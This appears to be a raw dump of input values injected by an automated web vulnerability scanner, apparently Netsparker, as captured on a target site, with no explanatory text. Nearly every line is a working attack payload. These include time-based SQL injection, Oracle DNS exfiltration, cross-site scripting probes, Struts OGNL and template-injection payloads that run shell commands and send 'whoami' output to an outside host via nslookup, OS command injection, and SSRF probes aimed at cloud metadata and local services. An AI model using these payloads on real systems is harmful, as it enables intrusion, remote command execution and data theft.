  • 3: 1';SELECT pg_sleep(25)--
  • :
  • 3: arguments[1].end(require('child_process').execSync('expr 268409241 - 32662'))
  • 3: (select UTL_INADDR.GET_HOST_ADDRESS(chr(97)||chr(99)||chr(109)||chr(112)||chr(122)||chr(110)||chr(110)||chr(121)||chr(120)||chr(108)||chr(48)||chr(98)||chr(107)||chr(97)||chr(101)||chr(118)||chr(120)||chr(101)||chr(116)||chr(109)||chr(116)||chr(98)||chr(106)||chr(120)||chr(100)||chr(113)||chr(99)||chr(102)||chr(103)||chr(111)||chr(108)||chr(101)||chr(55)||chr(118)||chr(49)||chr(51)||chr(121)||chr(97)||chr(50)||chr(115)||chr(107)||chr(99)||chr(111)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL)
  • :
  • :
  • 3: 3
  • :
  • : 1;SELECT pg_sleep(25)--
  • 3: 3
  • : (length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(97)||chr(99)||chr(109)||chr(112)||chr(122)||chr(110)||chr(110)||chr(121)||chr(120)||chr(108)||chr(117)||chr(105)||chr(97)||chr(121)||chr(122)||chr(115)||chr(110)||chr(110)||chr(116)||chr(115)||chr(121)||chr(99)||chr(55)||chr(116)||chr(110)||chr(111)||chr(105)||chr(107)||chr(111)||chr(116)||chr(55)||chr(55)||chr(110)||chr(113)||chr(110)||chr(50)||chr(109)||chr(104)||chr(49)||chr(97)||chr(55)||chr(100)||chr(115)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL))))
  • : arguments[1].end(require('child_process').execSync('set /A 268409241 - 64361'))
  • 3: 3
  • 3: 3
  • 3: 3
  • 3: 3
  • : n3tsp4rke2
  • : nxtspxrkex
  • : N3TSP4RKE2
  • 3: 1;SELECT pg_sleep(25)--
  • 3: (length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(97)||chr(99)||chr(109)||chr(112)||chr(122)||chr(110)||chr(110)||chr(121)||chr(120)||chr(108)||chr(106)||chr(55)||chr(55)||chr(106)||chr(98)||chr(50)||chr(112)||chr(110)||chr(101)||chr(49)||chr(116)||chr(50)||chr(50)||chr(100)||chr(52)||chr(99)||chr(113)||chr(112)||chr(120)||chr(54)||chr(48)||chr(98)||chr(119)||chr(97)||chr(50)||chr(117)||chr(115)||chr(116)||chr(52)||chr(113)||chr(122)||chr(104)||chr(105)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL))))
  • :
  • 3: 3
  • 3: arguments[1].end(require('child_process').execSync('set /A 268409241 - 27105'))
  • : '"--></style></scRipt><scRipt>netsparker(0x047ED5)</scRipt>
  • :
  • :
  • : SELECT pg_sleep(25)--
  • : '||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(97)||chr(99)||chr(109)||chr(112)||chr(122)||chr(110)||chr(110)||chr(121)||chr(120)||chr(108)||chr(120)||chr(110)||chr(109)||chr(101)||chr(102)||chr(105)||chr(120)||chr(107)||chr(118)||chr(103)||chr(103)||chr(107)||chr(102)||chr(99)||chr(122)||chr(48)||chr(51)||chr(100)||chr(120)||chr(103)||chr(105)||chr(117)||chr(100)||chr(95)||chr(120)||chr(53)||chr(106)||chr(110)||chr(119)||chr(50)||chr(57)||chr(107)||chr(105)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL))||'
  • 3: 3
  • 3: 3
  • : %{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("a",268409241-66346)}
  • 3: '"--></style></scRipt><scRipt>netsparker(0x047ED6)</scRipt>
  • 3: SELECT pg_sleep(25)--
  • 3: 3
  • 3: 3
  • 3: 3
  • 3: '||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(97)||chr(99)||chr(109)||chr(112)||chr(122)||chr(110)||chr(110)||chr(121)||chr(120)||chr(108)||chr(102)||chr(122)||chr(99)||chr(51)||chr(48)||chr(95)||chr(97)||chr(50)||chr(100)||chr(115)||chr(113)||chr(120)||chr(104)||chr(117)||chr(119)||chr(107)||chr(108)||chr(119)||chr(54)||chr(48)||chr(100)||chr(120)||chr(102)||chr(113)||chr(50)||chr(122)||chr(110)||chr(49)||chr(113)||chr(56)||chr(105)||chr(57)||chr(107)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL))||'
  • :
  • 3: %{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("a",268409241-75143)}
  • : 1);SELECT pg_sleep(25)--
  • 3: 3
  • :
  • : %27%22--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt%3Enetsparker%280x047EF5%29%3C%2FscRipt%3E
  • 3: 3
  • :
  • : p "#{0xFFF9999.to_i-`echo 63432`.to_i}"
  • 3: 1);SELECT pg_sleep(25)--
  • 3: 3
  • 3: 3
  • 3: %27%22--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt%3Enetsparker%280x047EF6%29%3C%2FscRipt%3E
  • :
  • 3: 3
  • : 1');SELECT pg_sleep(25)--
  • 3: p "#{0xFFF9999.to_i-`echo 57104`.to_i}"
  • 3: 3
  • :
  • : 1'"--></style></scRipt><scRipt>netsparker(0x047F1C)</scRipt>
  • 3: 3
  • :
  • 3: 1');SELECT pg_sleep(25)--
  • 3: 3
  • : __import__('os').popen(('expr 268409241 - {0}').format('47997')).read()
  • 3: 3
  • 3: 1'"--></style></scRipt><scRipt>netsparker(0x047F1D)</scRipt>
  • :
  • 3: 3
  • : 1'));SELECT pg_sleep(25)--
  • 3: 3
  • :
  • 3: __import__('os').popen(('expr 268409241 - {0}').format('87388')).read()
  • 3: 3
  • : data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDQ3RjM0KTwvc2NyaXB0Pg==
  • 3: 3
  • 3: 1'));SELECT pg_sleep(25)--
  • :
  • 3: 3
  • : __import__('os').popen(('SET /A 268409241 - {0}').format('46964')).read()
  • 3: 3
  • : 1));SELECT pg_sleep(25)--
  • 3: data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDQ3RjM1KTwvc2NyaXB0Pg==
  • 3: 3
  • 3: 3
  • 3: __import__('os').popen(('SET /A 268409241 - {0}').format('21200')).read()
  • :
  • 3: 1));SELECT pg_sleep(25)--
  • : '" ns=netsparker(0x048055)
  • 3: 3
  • :
  • : ((SELECT(1)FROM(SELECT(SLEEP(25)))A))
  • 3: 3
  • 3: 3
  • 3: '" ns=netsparker(0x048056)
  • 3: 3
  • 3: ((SELECT(1)FROM(SELECT(SLEEP(25)))A))
  • 3: 3
  • :
  • : 1 ns=netsparker(0x048062)
  • 3: 3
  • :
  • : '+((SELECT 1 FROM (SELECT SLEEP(25))A))+'
  • 3: 3
  • 3: 1 ns=netsparker(0x048063)
  • 3: 3
  • 3: 3
  • 3: '+((SELECT 1 FROM (SELECT SLEEP(25))A))+'
  • 3: 3
  • : //r87.com/n/n.css?0x04809B
  • :
  • 3: 3
  • :
  • : -1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+'
  • 3: //r87.com/n/n.css?0x04809C
  • 3: 3
  • 3: 3
  • 3: -1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+'
  • 3: 3
  • 3: 3
  • : //r87.com/n/j/?0x0480A7
  • : -1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))
  • :
  • 3: 3
  • :
  • 3: -1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))
  • 3: //r87.com/n/j/?0x0480A8
  • :
  • 3: 3
  • 3: 3
  • : -1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+"
  • : '><net sparker=netsparker(0x0480BD)>
  • :
  • :
  • 3: -1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+"
  • :
  • :
  • 3: '><net sparker=netsparker(0x0480BE)>
  • 3: 3
  • : ') AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1
  • :
  • 3: 3
  • : "><net sparker=netsparker(0x0480CB)>
  • :
  • 3: ') AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1
  • :
  • :
  • 3: "><net sparker=netsparker(0x0480CC)>
  • :
  • :
  • 3: 3
  • : <iMg src=N onerror=netsparker(0x0480FB)>
  • :
  • 3: 3
  • :
  • 3: <iMg src=N onerror=netsparker(0x0480FC)>
  • :
  • :
  • 3: 3
  • :
  • :
  • : javascript:netsparker(0x048107)
  • :
  • 3: 3
  • 3: 3
  • :
  • 3: 3
  • 3: javascript:netsparker(0x048108)
  • :
  • :
  • :
  • :
  • : <scRipt>ns(0x048135)</scRipt>
  • :
  • 3: 3
  • 3: 3
  • 3: <scRipt>ns(0x048136)</scRipt>
  • :
  • : https://rsalramelan.com/trace.axd
  • :
  • :
  • : <%a style=x:expre/**/ssion(netsparker(0x048141))>
  • 3: https://rsalramelan.com/trace.axd
  • :
  • 3: 3
  • 3: <%a style=x:expre/**/ssion(netsparker(0x048142))>
  • :
  • : rsalramelan.com/trace.axd
  • :
  • :
  • : n;ns:expression(netsparker(0x048181));
  • 3: rsalramelan.com/trace.axd
  • :
  • 3: 3
  • 3: n;ns:expression(netsparker(0x048182));
  • :
  • : 36.91.147.95/trace.axd
  • :
  • :
  • : body{x:expression(netsparker(0x04818F))}
  • 3: 36.91.147.95/trace.axd
  • :
  • 3: 3
  • 3: body{x:expression(netsparker(0x048190))}
  • :
  • :
  • : 127.100.11.2/trace.axd
  • :
  • 3: 3
  • : */netsparker(0x04819B);/*
  • :
  • 3: 3
  • 3: 127.100.11.2/trace.axd
  • :
  • :
  • 3: */netsparker(0x04819C);/*
  • 3: 3
  • : ::1/trace.axd
  • 3: 3
  • : gethostbyname(trim('acmpznnyxll66mvdq3w3x6bisopf6szeuhasf6kw'.'bv4.r87.me'))
  • : '+netsparker(0x0481F3)+'
  • 3: 3
  • 3: ::1/trace.axd
  • 3: gethostbyname(trim('acmpznnyxlntbk0s98wtvoetpj2kqh4wkggi1e2y'.'_qq.r87.me'))
  • 3: 3
  • 3: '+netsparker(0x0481F4)+'
  • :
  • : 127.0.0.1/trace.axd
  • : gethostbyname(trim('acmpznnyxlxfttfyu2xdd5prthg-zlz4wlv9gxvy'.'zoo.r87.me'));
  • 3: 3
  • : "+netsparker(0x04820B)+"
  • 3: gethostbyname(trim('acmpznnyxleeu9z79qbqen87almy3cjk0qddniyg'.'qzw.r87.me'));
  • 3: 3
  • 3: 127.0.0.1/trace.axd
  • 3: 3
  • : +gethostbyname(trim('acmpznnyxls67iwwm5wcnjrbhssqofrn_zcdcgpc'.'7mc.r87.me'));//
  • 3: "+netsparker(0x04820C)+"
  • 3: 3
  • : [::1]/trace.axd
  • 3: +gethostbyname(trim('acmpznnyxlp9u3inovthro68qxf6er_qiaszhl1n'.'zvs.r87.me'));//
  • :
  • 3: 3
  • : \';netsparker(0x04821B);///
  • : '+gethostbyname(trim('acmpznnyxl2yzgzva7dqmpw8ld3eiv7mpslgpf2n'.'8sw.r87.me'))+'
  • 3: [::1]/trace.axd
  • 3: 3
  • 3: 3
  • 3: '+gethostbyname(trim('acmpznnyxlyz4ukyzk9kpgubrlto51eqqq8iya-s'.'cqk.r87.me'))+'
  • 3: \';netsparker(0x04821C);///
  • :
  • : https://rsalramelan.com/elmah.axd
  • 3: 3
  • : "+gethostbyname(trim('acmpznnyxlfmm5wiv3rdsw-bgnas6l_fwjo2xc85'.'7ya.r87.me'))+"
  • 3: 3
  • : &#39;,netsparker(0x048231),&#39;
  • 3: 3
  • 3: https://rsalramelan.com/elmah.axd
  • 3: "+gethostbyname(trim('acmpznnyxlfeuhszydhjbt0kctd4rw6fahtzcype'.'dia.r87.me'))+"
  • :
  • 3: 3
  • 3: &#39;,netsparker(0x048232),&#39;
  • : <? gethostbyname(trim('acmpznnyxlazh1x0khqkutw9kmypbfaf8mj9d2nt'.'fwe.r87.me'));//?>
  • : rsalramelan.com/elmah.axd
  • 3: 3
  • 3: 3
  • 3: <? gethostbyname(trim('acmpznnyxljn6opk7jdrv36lg9er_63ww7xuj2iw'.'jgy.r87.me'));//?>
  • : netsparker(0x04823F)
  • 3: 3
  • 3: rsalramelan.com/elmah.axd
  • :
  • : '{${gethostbyname(trim('acmpznnyxl8edwgs_0x_g9jccjmscgan3wlmnjjx'.'-qs.r87.me'))}}'
  • 3: 3
  • 3: netsparker(0x048240)
  • 3: '{${gethostbyname(trim('acmpznnyxlg5vxkchc4ppvjkinlxktbvphs2veum'.'_24.r87.me'))}}'
  • : 36.91.147.95/elmah.axd
  • 3: 3
  • 3: 3
  • : createobject("WScript.Shell").exec("nslookup acmpznnyxlwcuqttpwjd-4vwxtnlflrycvokwdw9" & "a1o.r87.me").StdOut.ReadAll
  • : netsparker(0x04824B);
  • 3: 3
  • 3: createobject("WScript.Shell").exec("nslookup acmpznnyxlbifuasiuntqvqnv3xc3ycdhnci6ov2" & "3ew.r87.me").StdOut.ReadAll
  • 3: 36.91.147.95/elmah.axd
  • :
  • 3: 3
  • : +createobject("WScript.Shell").exec("nslookup acmpznnyxlsjorxoguwbdibdm1gtlcpcpp89zx4g" & "zjm.r87.me").StdOut.ReadAll
  • 3: netsparker(0x04824C);
  • 3: 3
  • : 127.100.11.2/elmah.axd
  • 3: 3
  • 3: +createobject("WScript.Shell").exec("nslookup acmpznnyxljek5sovblsqc2rqrhmkmgequy-ddod" & "7io.r87.me").StdOut.ReadAll
  • 3: 3
  • : &#39;+netsparker(0x04825D)+&#39;
  • 3: 127.100.11.2/elmah.axd
  • : +createobject("WScript.Shell").exec("nslookup acmpznnyxl_tly3vokju91gepjcld2mpz8w0h5im" & "i5u.r87.me").StdOut.ReadAll+
  • 3: 3
  • :
  • 3: &#39;+netsparker(0x04825E)+&#39;
  • 3: +createobject("WScript.Shell").exec("nslookup acmpznnyxlngiqwofb8luy2ye2g-anvtk0mszgrm" & "kne.r87.me").StdOut.ReadAll+
  • 3: 3
  • : ::1/elmah.axd
  • 3: 3
  • : <%createobject("WScript.Shell").exec("nslookup acmpznnyxlwjstcbike9vdsde2napofbmclb7mxw" & "wau.r87.me").StdOut.ReadAll%>
  • 3: 3
  • : '"@--></style></scRipt><scRipt>netsparker(0x0482A7)</scRipt>
  • 3: <%createobject("WScript.Shell").exec("nslookup acmpznnyxlhhmjs_9syb2uvtpvi_pcktayxges7e" & "ecm.r87.me").StdOut.ReadAll%>
  • 3: ::1/elmah.axd
  • :
  • 3: 3
  • : "+createobject("WScript.Shell").exec("nslookup acmpznnyxl4ukh-fg-mjaq-qhgy7cijras4tuqj8" & "ppg.r87.me").StdOut.ReadAll+"
  • 3: '"@--></style></scRipt><scRipt>netsparker(0x0482A8)</scRipt>
  • 3: 3
  • : 127.0.0.1/elmah.axd
  • 3: 3
  • 3: "+createobject("WScript.Shell").exec("nslookup acmpznnyxlkqqpglvxwoqciiviqa2fw76bcm47uy" & "mku.r87.me").StdOut.ReadAll+"
  • 3: 3
  • : %22%2bnetsparker(0x048318)%2b%22
  • 3: 127.0.0.1/elmah.axd
  • : gethostbyname(lc 'acmpznnyxlq6p4y176_s0nfkusbp2w3-tmrgubk4'.'1uu.r87.me')
  • 3: 3
  • :
  • 3: %22%2bnetsparker(0x048319)%2b%22
  • 3: gethostbyname(lc 'acmpznnyxl6no2brqh9g30cco8fwyc_o8ruhjjgx'.'ne4.r87.me')
  • : 000177.000.00000.000001/trace.axd
  • : [::1]/elmah.axd
  • 3: 3
  • : eval('gethostbyname(lc 'acmpznnyxlb6rjw0rcwngahviixwzxmvcj1uwcak'.'ono.r87.me')')
  • : 0177.0.0.1/trace.axd
  • : <html xmlns="http://www.w3.org/1999/xhtml"><script>netsparker(0x048362)</script></html>
  • 3: [::1]/elmah.axd
  • 3: eval('gethostbyname(lc 'acmpznnyxlt9daggqvolg8smvvblryhrxtfdxcry'.'ofw.r87.me')')
  • : 0177.0.1/trace.axd
  • 3: <html xmlns="http://www.w3.org/1999/xhtml"><script>netsparker(0x048363)</script></html>
  • :
  • : '+gethostbyname(lc 'acmpznnyxlh5bxt_kqaxvtzw5bhs6g0hxp2_pbjt'.'nz0.r87.me')+'
  • : https://rsalramelan.com/elmah
  • : 0177.1/trace.axd
  • : //r87.com/?0x0483C3
  • 3: '+gethostbyname(lc 'acmpznnyxl7of-ottbs0gx4lbgw6wereux7x0pdp'.'olk.r87.me')+'
  • 3: 3
  • : 017700000001/trace.axd
  • 3: //r87.com/?0x0483C4
  • : "+gethostbyname(lc 'acmpznnyxlzp8pfdoay8gcwvfevy9swvxa6vbnqr'.'yo8.r87.me')+"
  • 3: https://rsalramelan.com/elmah
  • : 0x7f.0.0.1/trace.axd
  • :
  • : <a HrEf=JaVaScRiPt:netsparker(0x0483DD)>
  • 3: "+gethostbyname(lc 'acmpznnyxlk9ez72as-scqd4smm5lj0whuib_p5t'.'174.r87.me')+"
  • : 0x7f.0.1/trace.axd
  • : rsalramelan.com/elmah
  • : nslookup acmpznnyxl6wmcf7fzoj-q2hzavo2kwhdz7jonu-^vok.r87.me&'\"`0&nslookup acmpznnyxl6wmcf7fzoj-q2hzavo2kwhdz7jonu-^vok.r87.me&`'
  • : 0x7f.1/trace.axd
  • 3: 3
  • 3: <a HrEf=JaVaScRiPt:netsparker(0x0483DE)>
  • 3: rsalramelan.com/elmah
  • 3: nslookup acmpznnyxlxdodajrdch2m2vqkhffzcyxnqz6nid^anu.r87.me&'\"`0&nslookup acmpznnyxlxdodajrdch2m2vqkhffzcyxnqz6nid^anu.r87.me&`'
  • : 0x7f000001/trace.axd
  • :
  • : ns@mail.ns'"/>()%26%25<ScRiPt >netsparker(0x048416)</ScRiPt>
  • : 36.91.147.95/elmah
  • : 127.0.0.1/trace.axd
  • : & nslookup acmpznnyxl2vhnwgkgaql1cggpzs_sfrdthsi2iq^iea.r87.me&'\"`0&nslookup acmpznnyxl2vhnwgkgaql1cggpzs_sfrdthsi2iq^iea.r87.me&`'
  • 3: 3
  • 3: ns@mail.ns'"/>()%26%25<ScRiPt >netsparker(0x048417)</ScRiPt>
  • : 127.0.1/trace.axd
  • 3: 36.91.147.95/elmah
  • 3: & nslookup acmpznnyxlulofyvxchjbxx1olydiwuvumvrxwfg^3_8.r87.me&'\"`0&nslookup acmpznnyxlulofyvxchjbxx1olydiwuvumvrxwfg^3_8.r87.me&`'
  • : 127.1/trace.axd
  • : &apos;&quot;--&gt;&lt;/style&gt;&lt;/scRipt&gt;&lt;iMg src=N onerror=netsparker(0x048436)&gt;
  • :
  • : 16777343/trace.axd
  • : '& nslookup acmpznnyxlxe747ynw03lveuxqnvt5hzk2rpaiso^hbk.r87.me&'\"`0&nslookup acmpznnyxlxe747ynw03lveuxqnvt5hzk2rpaiso^hbk.r87.me&`'
  • : 127.100.11.2/elmah
  • 3: &apos;&quot;--&gt;&lt;/style&gt;&lt;/scRipt&gt;&lt;iMg src=N onerror=netsparker(0x048437)&gt;
  • : 00044.00133.0000223.00000137/trace.axd
  • 3: 3
  • 3: '& nslookup acmpznnyxlwva4gmernbuiz2tg_wigipcw9yfrtj^700.r87.me&'\"`0&nslookup acmpznnyxlwva4gmernbuiz2tg_wigipcw9yfrtj^700.r87.me&`'
  • : 044.6001503/trace.axd
  • 3: 127.100.11.2/elmah
  • : &apos;&quot;&gt;&lt;iMg src=N onerror=netsparker(0x048462)&gt;
  • :
  • : 044.91.147.95/trace.axd
  • : "& nslookup acmpznnyxlo-rsh-sihgke2fmonoov8ubdskkwxn^dh4.r87.me&'\"`0&nslookup acmpznnyxlo-rsh-sihgke2fmonoov8ubdskkwxn^dh4.r87.me&`'
  • 3: &apos;&quot;&gt;&lt;iMg src=N onerror=netsparker(0x048463)&gt;
  • : ::1/elmah
  • : 044.91.37727/trace.axd
  • 3: 3
  • 3: "& nslookup acmpznnyxl_4ixieayp-uteqjf5cehljizaye-b5^5sw.r87.me&'\"`0&nslookup acmpznnyxl_4ixieayp-uteqjf5cehljizaye-b5^5sw.r87.me&`'
  • : &lt;iMg src=N onerror=ns(0x048488)&gt;
  • : 04426711537/trace.axd
  • 3: ::1/elmah
  • : nslookup "acmpznnyxlobulzbi-fmdarj-ftceuvkvzaz-l__""r-a.r87.me"
  • :
  • 3: &lt;iMg src=N onerror=ns(0x048489)&gt;
  • : 0x24.6001503/trace.axd
  • : 127.0.0.1/elmah
  • 3: nslookup "acmpznnyxlgfvxqzm_iz0rzqdmsop0dtef8adarh""cuu.r87.me"
  • : &apos;&quot;--&gt;&lt;/style&gt;&lt;/scRipt&gt;&lt;iMg src=N onerror=netsparker`0x0484A4`&gt;
  • 3: 3
  • : 0x24.91.147.95/trace.axd
  • 3: 127.0.0.1/elmah
  • : &nslookup "acmpznnyxlsbnmd2ofll0oa5iet1l_lw_dns9xig""koi.r87.me"
  • 3: &apos;&quot;--&gt;&lt;/style&gt;&lt;/scRipt&gt;&lt;iMg src=N onerror=netsparker`0x0484A5`&gt;
  • : 0x24.91.37727/trace.axd
  • :
  • 3: &nslookup "acmpznnyxlppcg-fr-w-vjjaaj-yy7wxwyt99fxv""uw0.r87.me"
  • : [::1]/elmah
  • : 0x245b935f/trace.axd
  • : &apos;&quot;&gt;&lt;iMg src=N onerror=netsparker`0x0484E6`&gt;
  • : '&nslookup "acmpznnyxlltgs3ccmbycumvoyw3vgjgyatlwu6e""jby.r87.me"
  • 3: 3
  • : 1603492644/trace.axd
  • 3: [::1]/elmah
  • 3: &apos;&quot;&gt;&lt;iMg src=N onerror=netsparker`0x0484E7`&gt;
  • 3: '&nslookup "acmpznnyxlmh4bi2c4dfkietwhmuqs-jrc333pju""qlk.r87.me"
  • : 36.6001503/trace.axd
  • :
  • : http://aws.r87.me/latest/meta-data/public-hostname
  • : &lt;iMg src=N onerror=ns`0x04852E`&gt;
  • : 36.91.147.95/trace.axd
  • : "&nslookup "acmpznnyxlmgv81i97g7hy_1cvafph9b_dnx8jtr""p0q.r87.me"
  • 3: 3
  • 3: http://aws.r87.me/latest/meta-data/public-hostname
  • : 36.91.37727/trace.axd
  • 3: &lt;iMg src=N onerror=ns`0x04852F`&gt;
  • 3: "&nslookup "acmpznnyxljr7oejbvudql1ple56mn-p3q9ysbzu""v44.r87.me"
  • 3: 000177.000.00000.000001/trace.axd
  • :
  • : http://169.254.169.254/latest/meta-data/public-hostname
  • : Content-Type:text/html <scRipt>ns(0x048534)</scRipt>
  • : |nslookup${IFS}"acmpznnyxl3szeli_kifw8lqutrxtcztmvomf_la""8rc.r87.me"
  • 3: 0177.0.0.1/trace.axd
  • 3: 3
  • 3: http://169.254.169.254/latest/meta-data/public-hostname
  • 3: 0177.0.1/trace.axd
  • 3: Content-Type:text/html <scRipt>ns(0x048535)</scRipt>
  • 3: |nslookup${IFS}"acmpznnyxlnk6ct54oanlp9s8ootouc6clurwzed""jwc.r87.me"
  • 3: 0177.1/trace.axd
  • :
  • : http://127.0.0.1:22
  • 3: 017700000001/trace.axd
  • : %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='nslookup `whoami`."acmpznnyxl5vz_3y_-qubi7b08exygpm9smbxcq6""s64.r87.me"').(#p=new java.lang.ProcessBuilder({'/bin/bash','-c',#cmd})).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
  • : <frame src="javascript:netsparker(0x04853C)"></frame>
  • 3: 3
  • 3: 0x7f.0.0.1/trace.axd
  • 3: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='nslookup `whoami`."acmpznnyxlyo6hpernhitcav1qbbngxwsol4oyyz""o9k.r87.me"').(#p=new java.lang.ProcessBuilder({'/bin/bash','-c',#cmd})).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
  • 3: http://127.0.0.1:22
  • 3: <frame src="javascript:netsparker(0x04853D)"></frame>
  • 3: 0x7f.0.1/trace.axd
  • :
  • :
  • :
  • :
  • : %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='nslookup "acmpznnyxl1zvncvx9g_ejavbvfyishhjgdpiaiz"i38.r87.me"').(#p=new java.lang.ProcessBuilder({'cmd.exe','/c',#cmd})).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
  • 3: 0x7f.1/trace.axd
  • : http://36.91.147.95:22
  • :
  • 3: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='nslookup "acmpznnyxlozeovhifatiqntd-gcs_btw3zflfzn"46a.r87.me"').(#p=new java.lang.ProcessBuilder({'cmd.exe','/c',#cmd})).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
  • 3: 0x7f000001/trace.axd
  • 3: 3
  • : ${__import__('os').popen(__import__('base64').urlsafe_b64decode('bnNsb29rdXAgYWNtcHpubnl4bGt6dWZhMmxlMi1wbHJldmFvbGV6d3c3X3A2bTNlYWFleS5yODcubWU=')).read()}
  • 3: 127.0.0.1/trace.axd
  • 3: http://36.91.147.95:22
  • 3: 3
  • 3: ${__import__('os').popen(__import__('base64').urlsafe_b64decode('bnNsb29rdXAgYWNtcHpubnl4bGZraWgxa2poaHVrbTZlcnZ3cjc0bXZrb3E1dm9hZ3JtMC5yODcubWU=')).read()}
  • 3: 127.0.1/trace.axd
  • :
  • : {{__import__('os').popen(__import__('base64').urlsafe_b64decode('bnNsb29rdXAgYWNtcHpubnl4bDBfd3RmYl9zeXh5dTh6M2E3M3Njam50czNyaHg0di05MC5yODcubWU=')).read()}}
  • : http://::1:22
  • 3: 127.1/trace.axd
  • :
  • 3: {{__import__('os').popen(__import__('base64').urlsafe_b64decode('bnNsb29rdXAgYWNtcHpubnl4bHdoMGY0Zzl6cXl6cGF1ajdmZGlodm5hc2ZhdXk0eXhtZy5yODcubWU=')).read()}}
  • 3: 3
  • 3: 16777343/trace.axd
  • : {% set d = "eval(__import__('base64').urlsafe_b64decode('X19pbXBvcnRfXygnb3MnKS5wb3BlbihfX2ltcG9ydF9fKCdiYXNlNjQnKS51cmxzYWZlX2I2NGRlY29kZSgnYm5Oc2IyOXJkWEFnWVdOdGNIcHVibmw0YkhsNGNXeDVibk5yZFRWNE1tdzJjM2xzWTNScVkyRmhlV00wTUhrNGVtaHVaeTV5T0RjdWJXVT0nKSkucmVhZCgp'))" %}{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %}{% for b in c.__init__.func_globals.values() %} {% if b.__class__ == {}.__class__ %}{% if 'eval' in b.keys() %}{{ b['eval'](d) }}{% endif %}{% endif %}{% endfor %}{% endif %}{% endfor %}
  • 3: http://::1:22
  • 3: 3
  • 3: 00044.00133.0000223.00000137/trace.axd
  • 3: {% set d = "eval(__import__('base64').urlsafe_b64decode('X19pbXBvcnRfXygnb3MnKS5wb3BlbihfX2ltcG9ydF9fKCdiYXNlNjQnKS51cmxzYWZlX2I2NGRlY29kZSgnYm5Oc2IyOXJkWEFnWVdOdGNIcHVibmw0YkhGM1luZGpaV3AyY3kxdU1HRm9hR2h3ZFhWb2NHcGtkR04yWm01dkxUSjNkUzV5T0RjdWJXVT0nKSkucmVhZCgp'))" %}{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %}{% for b in c.__init__.func_globals.values() %} {% if b.__class__ == {}.__class__ %}{% if 'eval' in b.keys() %}{{ b['eval'](d) }}{% endif %}{% endif %}{% endfor %}{% endif %}{% endfor %}
  • :
  • 3: 044.6001503/trace.axd
  • : http://[::1]:22
  • : ${global.process.mainModule.require('child_process').execSync(Buffer('bnNsb29rdXAgYWNtcHpubnl4bHktaXlua3c3MmVqX3BteHI4dzR5aHJrajNxdnV0dTY1Yy5yODcubWU=','base64').toString())}
  • :
  • 3: 044.91.147.95/trace.axd
  • 3: 3
  • 3: ${global.process.mainModule.require('child_process').execSync(Buffer('bnNsb29rdXAgYWNtcHpubnl4bGRiYmR2a3U2NGxpa3BjcWZzbHV0Z2NhOHlwMGxwamV2Zy5yODcubWU=','base64').toString())}
  • 3: http://[::1]:22
  • 3: 044.91.37727/trace.axd
  • 3: 3
